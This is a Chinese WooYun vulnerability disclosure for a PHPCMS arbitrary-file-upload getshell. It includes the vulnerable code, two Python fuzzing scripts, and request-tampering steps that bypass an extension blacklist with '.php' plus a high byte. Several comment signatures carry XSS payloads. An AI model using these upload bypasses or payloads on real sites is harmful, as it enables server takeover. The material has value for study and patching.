当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062881

漏洞标题:PHPCMS全版本通杀getshell(前台)

相关厂商:phpcms

漏洞作者: felixk3y

提交时间:2014-05-30 16:05

修复时间:2014-08-28 16:06

公开时间:2014-08-28 16:06

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-30: 细节已通知厂商并且等待厂商处理中
2014-05-30: 厂商已经确认,细节仅向厂商公开
2014-06-02: 细节向第三方安全合作伙伴开放
2014-07-24: 细节向核心白帽子及相关领域专家公开
2014-08-03: 细节向普通白帽子公开
2014-08-13: 细节向实习白帽子公开
2014-08-28: 细节向公众公开

简要描述:

这里的全版本是指:最新v9.5.6 + v9 others +phpcms 2008 + ..
这个漏洞在Windows下和Linux下利用方法不一样,鉴于 @phpcms (省略10000字),都懂的..
这里我只给出Windows的利用方法(Linux的利用涉及另一个漏洞,暂不公开)
Tips:这个洞在我手里已经有很长一段时间了,主要目的是分享里面涉及的思路.

详细说明:

#1漏洞文件及相应的代码
/phpcms/libs/classes/attachment.class.php
/phpcms/modules/attachment/attachments.php
造成漏洞的代码(只贴最重要的)

$aids = $attachment->upload('Filedata',$_POST['filetype_post'],'','',array($_POST['thumb_width'],$_POST['thumb_height']),$_POST['watermark_enable']);
//...
foreach($uploadfiles as $k=>$file) {
	$fileext = fileext($file['name']);
	if($file['error'] != 0) {
		$this->error = $file['error'];
		return false;				
	}
	if(!preg_match("/^(".$this->alowexts.")$/", $fileext)) {
		$this->error = '10';
		return false;
	}
	if($this->maxsize && $file['size'] > $this->maxsize) {
		$this->error = '11';
		return false;
	}
	if(!$this->isuploadedfile($file['tmp_name'])) {
		$this->error = '12';
		return false;
	}
	$temp_filename = $this->getname($fileext);
	$savefile = $this->savepath.$temp_filename;
	$savefile = preg_replace("/(php|phtml|php3|php4|jsp|exe|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(\.|$)/i", "_\\1\\2", $savefile);
	$filepath = preg_replace(new_addslashes("|^".$this->upload_root."|"), "", $savefile);
	//..
}


从上面的代码,可以看出上传的文件类型是我们可以控制的,$_POST['filetype_post'] post提交的,于是我们貌似就可以直接上传php类型的文件,是不是呢? 显然不是,接下来的这行代码限制了我们上传的文件格式

$savefile = preg_replace("/(php|phtml|php3|php4|jsp|exe|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(\.|$)/i", "_\\1\\2", $savefile);


很明显,只要文件类似test.php,test.php.php经过此代码后,均会被修改为test._php,test._php._php,显然不是我们想要的结果,我们来分析分析 这个正则替换(这里我们简化下)..

preg_replace("/(php|php3|php4)(\.|$)/i", "_\\1\\2", $savefile);


正则的意思是字符串中查找以php结尾或包含"php."的字符串,找到就将之加上相应的下划线替换掉,这个正则表面上看起来似乎没有什么问题,但是仔细想想呢,还是有问题的..
倘若我们上传的文件后缀为".phpX"(这里的"X"表示某一特殊字符),则绕过了这个正则,而恰巧".phpX"可以解析为php(如php3,php4,当然这里这两个不行),或.phpX经过后面函数或程序代码的处理,或利用系统的特性、PHP的特性等,将这个特殊字符处理掉,那不就ok了,下面就来测试这两种情况..
#2 测试用的伪代码
为了更好的测试,我这里简化了代码,更改为如下

<?php
if(isset($_POST['submit'])){
	$savefile = $_FILES['file']['name'];
	$tempfile = $_FILES['file']['tmp_name'];
	$savefile = preg_replace("/(php|php3|php4)(\.|$)/i", "_\\1\\2", $savefile);//这里是整个漏洞的核心代码,同样这里进行了简化,我们只关注php
	$savefile = 'upload/'.$savefile;
	if(upload($tempfile,$savefile,true)){//copy & move_uploaded_file
		exit('Success upload,path is:'.$savefile."<br>");
	}
}
function upload($src,$dst,$mode=false){
	if($mode){
		if(@copy($src,$dst)){
			return true;
		}
	}else{
		if(@move_uploaded_file($src,$dst)){
			return true;
		}
	}
	return false;
}
?>
<html>
<body>
<form method="post" action="copy.php" enctype="multipart/form-data">
 <input type="file" name="file" value="1111"/>
 <input type="submit" name="submit" value="upload"/>
</form>
</body>
</html>


#3 思路一:测试除了php3、php4,还有没有其他的后缀可以解析为php
Fuzzing 测试代码1如下(py)

#by felixk3y ..
import sys
import time
import random
import urllib
import urllib2
def randstr(num):
    sts = ''
    char = '1234567890abcdexyz'
    for i in range(num):
        sts += random.choice(char)
    return sts
def setfile(fname,fstr):
    try:
        fp = open(fname,'a+')
        fp.write(fstr)
        fp.close()
        return True
    except:
        return False
def hex_to_ascii(ch):
    return '{:c}'.format(int(float.fromhex(ch)))
if __name__=="__main__":
    mfile = []
    url = sys.argv[1]
    if 'http://' not in url:
        url = 'http://%s' % url
    fstr = '<?php\r\nphpinfo();\r\n?>'
    for i in range(256):
        s = '%02d' % i
        randnum = randstr(8)
        fname = 'uploads/(%s)%s.php'%(i,randnum)
        print '[+] Writing file %s ..'%fname
        shex = hex_to_ascii(s)
        fname = '%s%s'%(fname,shex)
        flag = setfile(fname,fstr)
        if flag:
            fname1=fname.decode('gbk', 'replace')
            fname1 = urllib.quote(fname1.encode('GB2312', 'replace'))
            u = '%s/%s'%(url,fname1)
            try:
                h = urllib2.urlopen(u)
                res = h.read()
                if 'DOCTYPE' in res:
                    mfile.append(fname)
            except:
                pass
    print '\r\n[+] The result is:'
    for uu in mfile:
        print uu


该程序在本地跑起来,效果如图..

1.png


可以看出,在Windows环境下,只有php3可以解析为php(Kali Linux测试php5可以解析为php),由于.php3会被转换为._php3,所以这个思路行不通..
#4 思路二:有没有可能将特殊字符串"X"干掉
Fuzzing 测试代码2如下(py)

#by felixk3y ..
import sys
import random
import urllib2
def hex_to_ascii(ch):
    return '{:c}'.format(int(float.fromhex(ch)))
def randstr(num):
    sts = ''
    char = '1234567890abcdexyz'
    for i in range(num):
        sts += random.choice(char)
    return sts
def postdata(mHex,sname):
    data = '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'
    data += 'Content-Disposition: form-data; name="file"; filename="%s.php%s"\r\n' % (sname,mHex)
    data += 'Content-Type: application/octet-stream\r\n\r\n'
    data += '<?php phpinfo();?>\r\n'
    data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'
    data += 'Content-Disposition: form-data; name="submit"\r\n\r\n'
    data += 'upload\r\n'
    data += '------WebKitFormBoundarycMYRelX1B2H69xy9--\r\n\r\n'
    return data
def Fuzzing(mstr,url):
    posturl='%shttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/copy.php' % url
    headers = {
        'User-Agent' : 'Googlebot/2.1 (+http://www.google.com/bot.html)',
        'Content-Type' : 'multipart/form-data; boundary=----WebKitFormBoundarycMYRelX1B2H69xy9'
    }
    sname = '%s-%s' % (mstr,randstr(8))
    sHex = hex_to_ascii(mstr)
    posts = postdata(sHex,sname)
    request = urllib2.Request(posturl,posts,headers)
    response = urllib2.urlopen(request)
    htmls = response.read()
    response.close()
if __name__=="__main__":
    url = sys.argv[1]
    if 'http://' not in url:
        url = 'http://%s' % url
    for i in range(256):
        print '[+] %d ' % i
        #time.sleep(2)
        if i==20:continue
        s = '%02d' % i
        Fuzzing(s,url)


同样,该程序在本地跑起来,效果如图..

D:\>Fuzzing_phpcms_upload.py www.vuln.org


2.png


3.png


文件名前面的数字是被"干掉"字符的十进制数字,可以看出%81--%99会被干掉..
该特性雷同Windows下对"."和" "(空格)的忽略。
#5 测试phpcms
好,由于经过上面的Fuzzing知道,只要文件名为".phpX"(X表示%81-%99),就可以生成绕过正则生成".php",成功getshell..
首先在网站后台进行如下的设置..
1.内容 > 管理栏目 > 设置投稿 (允许)
2.用户 > 会员组管理 > 管理会员组 > 设置是否允许上传附件(允许上传)

4.png


随便上传一个jpg文件(这里是显示phpinfo信息),抓包 修改,如图:

55.png


这里有两处需要修改:

jpg|jpeg|gif|bmp|png|doc|docx|xls|xlsx|ppt|pptx|pdf|txt|rar|zip|swf 
//后面添加phpX
Content-Disposition: form-data; name="Filedata"; filename="11.jpg" 
//上面的11.jpg修改为phpX
这里X为%81-%99


点击Forward即可在 /phpcms/uploadfile/2014/0530/ 目录下生成php文件,如图

8.png


就到这里了,至于phpcms 2008 getshell的方法与之类似,不再阐述..

漏洞证明:

8.png

修复方案:

不想多说..

版权声明:转载请注明来源 felixk3y@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-05-30 17:50

厂商回复:

感谢反馈。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-05-30 16:07 | 卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)

    神奇的路人甲~

  2. 2014-05-30 16:08 | Noxxx ( 普通白帽子 | Rank:509 漏洞数:41 )

    顶一下!

  3. 2014-05-30 16:08 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    我擦!逆天了~

  4. 2014-05-30 16:09 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    尼玛潜水的都出来了

  5. 2014-05-30 16:11 | Moc ( 路人 | Rank:23 漏洞数:12 | 屌丝何苦为难屌丝)

    狗眼已被晃瞎

  6. 2014-05-30 16:14 | 低调的瘦子 ( 普通白帽子 | Rank:466 漏洞数:68 | loading……………………)

    说好的discuz呢!

  7. 2014-05-30 16:14 | 【|→上善若水】 ( 普通白帽子 | Rank:127 漏洞数:25 | 【|→上善若水】)

    你有脾气不要匿名!

  8. 2014-05-30 16:16 | 索马里的海贼 ( 普通白帽子 | Rank:254 漏洞数:24 | http://tieba.baidu.com/f?kw=WOW)

    这个屌爆了

  9. 2014-05-30 16:16 | niliu 认证白帽子 ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

    要火啊

  10. 2014-05-30 16:19 | null ( 路人 | Rank:15 漏洞数:2 | 左岸是无法忘却的回忆,右岸是值得把握的青...)

    神奇的路人甲~

  11. 2014-05-30 16:21 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    路人甲别那么给力好吗

  12. 2014-05-30 16:21 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    你有脾气不要匿名!

  13. 2014-05-30 16:22 | 7z1 ( 实习白帽子 | Rank:94 漏洞数:14 | 黑客:探险家、网络中的幽灵、用技术捍卫正...)

    亮瞎了

  14. 2014-05-30 16:23 | F3K4 ( 普通白帽子 | Rank:121 漏洞数:49 | 木秀于林,风必摧之)

    你有脾气不要匿名!

  15. 2014-05-30 16:26 | tenzy ( 普通白帽子 | Rank:176 漏洞数:21 | Need not to know)

    你有脾气不要匿名!

  16. 2014-05-30 16:29 | mramydnei ( 普通白帽子 | Rank:348 漏洞数:80 )

    你有脾气不要匿名!

  17. 2014-05-30 16:30 | msx2009 ( 路人 | Rank:5 漏洞数:7 | 信息安全 web开发)

    niub

  18. 2014-05-30 16:30 | tenzy ( 普通白帽子 | Rank:176 漏洞数:21 | Need not to know)

    要细节的打款到郭美美账号。PS:我的美美还在澳门欠款一亿多

  19. 2014-05-30 16:31 | pandas ( 普通白帽子 | Rank:585 漏洞数:58 | 国家一级保护动物)

    你有脾气不要匿名!

  20. 2014-05-30 16:32 | 小学猹 ( 实习白帽子 | Rank:81 漏洞数:30 | 暮春者,春服既成,冠者五六人,童子六七人...)

    火钳刘明

  21. 2014-05-30 16:35 | xfkxfk 认证白帽子 ( 核心白帽子 | Rank:2179 漏洞数:338 | 呵呵!)

    一切都是浮云

  22. 2014-05-30 16:37 | 小杰 ( 路人 | Rank:4 漏洞数:1 | 低调的一个人)

    牛X

  23. 2014-05-30 16:40 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    上传?

  24. 2014-05-30 16:46 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)

    你有脾气不要匿名!

  25. 2014-05-30 16:58 | CplusHua ( 普通白帽子 | Rank:238 漏洞数:33 | 乌云奖金:-1)

    Tips吊炸天

  26. 2014-05-30 17:01 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    吊炸天!!

  27. 2014-05-30 17:06 | 郭斯特 ( 普通白帽子 | Rank:181 漏洞数:69 | GhostWin)

    JJ fly!!~

  28. 2014-05-30 17:07 | 狗狗侠 ( 普通白帽子 | Rank:497 漏洞数:55 | 我是狗狗侠)

    艹 看来是得早点放出来了....

  29. 2014-05-30 17:09 | secgov ( 路人 | Rank:10 漏洞数:3 | 安全审计,漏洞挖掘,WAF. 揭露漏洞有风险,...)

    这个有点危险

  30. 2014-05-30 17:29 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    尼玛,原以为今儿放水了

  31. 2014-05-30 17:32 | Azui ( 路人 | Rank:25 漏洞数:10 | 用一只黑色铅笔画一出舞台默剧。)

    Tips:这个洞在我手里已经有很长一段时间了 黑产很久了吧。。

  32. 2014-05-30 17:37 | Tank ( 普通白帽子 | Rank:116 漏洞数:21 | 专注于白帽子渗透测试)

    @Azui 貌似是

  33. 2014-05-30 17:39 | Black`Rain ( 路人 | Rank:10 漏洞数:1 | The NetWork Without Borders !!!)

    ............你有脾气就不要匿名!

  34. 2014-05-30 17:40 | hack2012 ( 实习白帽子 | Rank:31 漏洞数:3 | 关注信息安全 http://www.waitalone.cn/)

    很牛x呀

  35. 2014-05-30 17:55 | 【|→上善若水】 ( 普通白帽子 | Rank:127 漏洞数:25 | 【|→上善若水】)

    漏洞Rank:7

  36. 2014-05-30 18:05 | 香草 ( 实习白帽子 | Rank:99 漏洞数:14 | javascript,xss,jsp、aspx)

    有脾气不要匿名

  37. 2014-05-30 18:07 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

    有脾气不要匿名.哈哈

  38. 2014-05-30 18:13 | tenzy ( 普通白帽子 | Rank:176 漏洞数:21 | Need not to know)

    漏洞Rank:7 好吧。目测不是传说中那么牛逼

  39. 2014-05-30 18:30 | ′ 蜗牛 ( 路人 | Rank:7 漏洞数:5 | 人外有人,天外有天,低调做人,低调做事。)

    你有脾气不要匿名!

  40. 2014-05-30 18:38 | rqndx ( 路人 | Rank:9 漏洞数:3 | 种子发我邮箱:01010101010101010101010101...)

    匿名的肯定拿提交站做坏事了 哈哈

  41. 2014-05-30 19:06 | felixk3y ( 普通白帽子 | Rank:523 漏洞数:41 | php python jsp)

    @phpcms 请你不要逼我,每次都是这样,不是6就是7,你信不信另外一个漏洞我直接公开。laj!

  42. 2014-05-30 20:13 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    现在放出来,无语啊,你肯定拿来做坏事了!

  43. 2014-05-30 20:28 | 1c3z ( 实习白帽子 | Rank:88 漏洞数:29 | 我读书少,你可别骗我!!!)

    说好的discuz呢!

  44. 2014-05-30 20:51 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)

    前台getshell 通杀就给 漏洞Rank:7 好吧。目测不是传说中那么牛逼

  45. 2014-05-30 22:11 | Haswell ( 普通白帽子 | Rank:167 漏洞数:18 | HorizonSec @ RDFZ)

    Tips:这个洞在我手里已经有很长一段时间了,今天我放出来的主要目的是希望大家能学习里面涉及的思路..

  46. 2014-05-30 22:55 | BadCat ( 实习白帽子 | Rank:81 漏洞数:21 | 悲剧的我什么都不会)

    这一定要学习的!补丁包发布后去比对一下代码

  47. 2014-05-30 23:48 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)

    @疯子 T 恤 啥时候发货呢。。等着围观ning.

  48. 2014-05-31 01:48 | rqndx ( 路人 | Rank:9 漏洞数:3 | 种子发我邮箱:01010101010101010101010101...)

    @tenzy 这洞是你的把 哈哈 你的洞都是PHPCMS的。。。

  49. 2014-05-31 10:00 | 微尘 ( 普通白帽子 | Rank:218 漏洞数:74 )

    叼炸天。

  50. 2014-05-31 16:39 | blacksun ( 路人 | Rank:13 漏洞数:1 | blacksun)

    你有脾气不要匿名!

  51. 2014-06-01 00:08 | 萝董 ( 实习白帽子 | Rank:31 漏洞数:4 | 你们好,我是萝董~QQ:1104360187 ,光交各...)

    这么叼?

  52. 2014-06-02 22:37 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  53. 2014-06-02 23:16 | 记得 ( 路人 | Rank:8 漏洞数:3 | 人 生 若 只 如 初 見)

    碉堡

  54. 2014-06-03 10:36 | dingding ( 路人 | Rank:13 漏洞数:1 | 也就业余玩玩)

    你有脾气不要匿名!

  55. 2014-06-03 12:25 | 78基佬 ( 实习白帽子 | Rank:84 漏洞数:20 | 不会日站的设计师不是好产品经理)

    jjboom啊。。。

  56. 2014-06-03 13:27 | 乌云合作伙伴-知道创宇(乌云厂商)

    nice

  57. 2014-06-03 19:59 | 小杰哥 ( 普通白帽子 | Rank:155 漏洞数:25 | 逆水行舟,不进则退。)

    感觉又到了一排phpcms的站点....

  58. 2014-06-04 10:57 | 狗狗侠 ( 普通白帽子 | Rank:497 漏洞数:55 | 我是狗狗侠)

    这个还是利用那个fuzz 截断的处理的吧! 哈哈

  59. 2014-06-04 12:44 | phith0n 认证白帽子 ( 核心白帽子 | Rank:656 漏洞数:107 | 一个想当文人的黑客~)

    @狗狗侠 嘘!!

  60. 2014-06-04 14:12 | Crkdoor ( 路人 | Rank:0 漏洞数:1 | 学习者)

    你有脾气不要匿名!

  61. 2014-06-04 14:18 | 好基友一辈子 ( 普通白帽子 | Rank:138 漏洞数:37 )

    @狗狗侠 f求细节怎么fuzz

  62. 2014-06-04 15:33 | conqu3r ( 普通白帽子 | Rank:156 漏洞数:21 | 没有思想,没有道德,没有自由,没有人权的...)

    给思路点个赞,fuzz的艺术!实践出真知!

  63. 2014-06-04 16:08 | 哎呀 ( 实习白帽子 | Rank:79 漏洞数:10 | 忙啊!!!)

    不是特殊文件名吧

  64. 2014-06-04 18:54 | Angelic47 ( 路人 | Rank:1 漏洞数:1 )

    卧槽这下流弊了!

  65. 2014-06-05 15:56 | 北洋贱队 ( 普通白帽子 | Rank:252 漏洞数:25 )

    什么时候公开啊

  66. 2014-06-06 09:31 | Bird ( 实习白帽子 | Rank:60 漏洞数:25 | Stay hungry. Stay foolish.)

    我擦。。。路人甲大神你好

  67. 2014-06-17 16:06 | c0lc ( 路人 | Rank:0 漏洞数:1 | 小牛牛说,要打死你)

    绝对要逆天了。哈

  68. 2014-06-17 16:55 | TellYouThat ( 路人 | Rank:6 漏洞数:3 | 不要叫我逗比,我只是个菜比)

    神人的路人甲

  69. 2014-06-19 07:48 | 好基友一辈子 ( 普通白帽子 | Rank:138 漏洞数:37 )

    @Haswell 你解释一下为什么菠菜排名不是织梦就是phpcms

  70. 2014-06-19 18:04 | ′ 雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    脚本版权 暴漏了洞主是谁

  71. 2014-06-19 18:07 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @′ 雨。 你好,鄙视你,发这个漏洞的第一时间我们就知道洞主是谁了

  72. 2014-06-19 18:10 | ′ 雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    @U神 卧槽。

  73. 2014-06-19 19:03 | 微尘 ( 普通白帽子 | Rank:218 漏洞数:74 )

    @′ 雨。 你看得到内容?坑?

  74. 2014-06-20 11:53 | neal ( 普通白帽子 | Rank:219 漏洞数:23 )

    你妹 对我公开了 还看不到?

  75. 2014-06-21 21:51 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    by felixk3y。EXP出卖了你

  76. 2014-06-21 22:09 | 微尘 ( 普通白帽子 | Rank:218 漏洞数:74 )

    @wefgod 你们看得到漏洞内容?为什么我看不到?

  77. 2014-06-21 22:41 | ′ 雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    @微尘 rank低了。

  78. 2014-06-21 22:44 | 微尘 ( 普通白帽子 | Rank:218 漏洞数:74 )

    @′ 雨。 好吧。能不能共享下哇。

  79. 2014-06-25 09:31 | c0lc ( 路人 | Rank:0 漏洞数:1 | 小牛牛说,要打死你)

    据说好像还看不了呢

  80. 2014-06-28 00:15 | 破锁 ( 路人 | Rank:23 漏洞数:6 )

    公开了,为啥还是看不到。。。。

  81. 2014-07-02 01:58 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒,什么都没留下。)

    怎么都是点上传直接就上去了。brup直接返回一个路径回来-.-根本没看到可以改的地方

  82. 2014-08-28 17:24 | 发条橙子 ( 路人 | Rank:19 漏洞数:6 | ∑(っ °Д °;)っ)

    终于被公开了

  83. 2014-08-28 18:12 | infant ( 路人 | Rank:26 漏洞数:11 | ส้้้้้้้้้้้้้้้้้้้...)

    我肯定洞主玩的累了

  84. 2014-08-28 19:06 | xsser_w ( 普通白帽子 | Rank:112 漏洞数:33 | 哎)

    这才是真正的黑客阿 会动脑子去研究 不像有的人只会用漏洞等别人发漏洞然后去搞网站

  85. 2014-08-28 22:58 | 黑吃黑 ( 普通白帽子 | Rank:139 漏洞数:29 | 倚楼听风雨,淡看江湖路...)

    当你们发布洞洞的时候,我只能偷偷的躲在角落看

  86. 2014-08-29 14:16 | Hello_C ( 路人 | Rank:0 漏洞数:1 | 谦和温顺且自持的生活,不乱于心,不困于情...)

    fuzz 的方法不错,很久以前大牛就教过用这种方法。

  87. 2014-08-30 09:54 | xsser_w ( 普通白帽子 | Rank:112 漏洞数:33 | 哎)

    @Hello_C 顺便求教别的fuzz 思路阿 求思考方式阿大神求带 求飞

  88. 2014-09-23 18:27 | 安利中国日用品公司(乌云厂商)

    很火

  89. 2014-12-01 10:24 | Zombiecc ( 路人 | Rank:0 漏洞数:2 | just for fun.)

    这个fuzz真心叼

  90. 2014-12-01 18:00 | GuoKer(ZhuLiu) ( 普通白帽子 | Rank:168 漏洞数:21 | 在校学生党的路过 霸气侧漏)

    要是linux用的是nginx 用%81-%99getshell就不成功

  91. 2014-12-01 21:33 | 小杰哥 ( 普通白帽子 | Rank:155 漏洞数:25 | 逆水行舟,不进则退。)

    牛逼

  92. 2014-12-06 15:45 | GuoKer(ZhuLiu) ( 普通白帽子 | Rank:168 漏洞数:21 | 在校学生党的路过 霸气侧漏)

    phpcms 2008如何利用啊

  93. 2014-12-16 14:55 | 一只寂寞的小鸟 ( 路人 | Rank:3 漏洞数:3 | ส็็็็็็็็็็็็็็็็็็็...)

    phpcms2008 不能利用、、 蛋碎

  94. 2014-12-23 02:43 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)

    linux 该如何利用呢?

  95. 2015-01-16 12:16 | Sofia ( 路人 | Rank:25 漏洞数:6 | 不会渗透的SEOer不是好站长)

    腻害哦

  96. 2015-03-26 14:15 | suolong ( 实习白帽子 | Rank:47 漏洞数:11 | 我有个野心,就是要成为世界第一的贱士!!)

    不是很理解fuzz %81 这个是操作系统特性导致的?通用的问题还是仅仅是当前phpcms系统的问题?求解答下。 或者私信下您的联系方式 跪谢。

  97. 2015-03-28 17:52 | Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)

    这个洞没有理解 这个x 是特殊符号 还是什么。

  98. 2015-04-23 10:48 | 名字xsser ( 路人 | Rank:5 漏洞数:1 | 顺流而下,把梦做完|最近小忙,有问题可以...)

    Fuzz大法好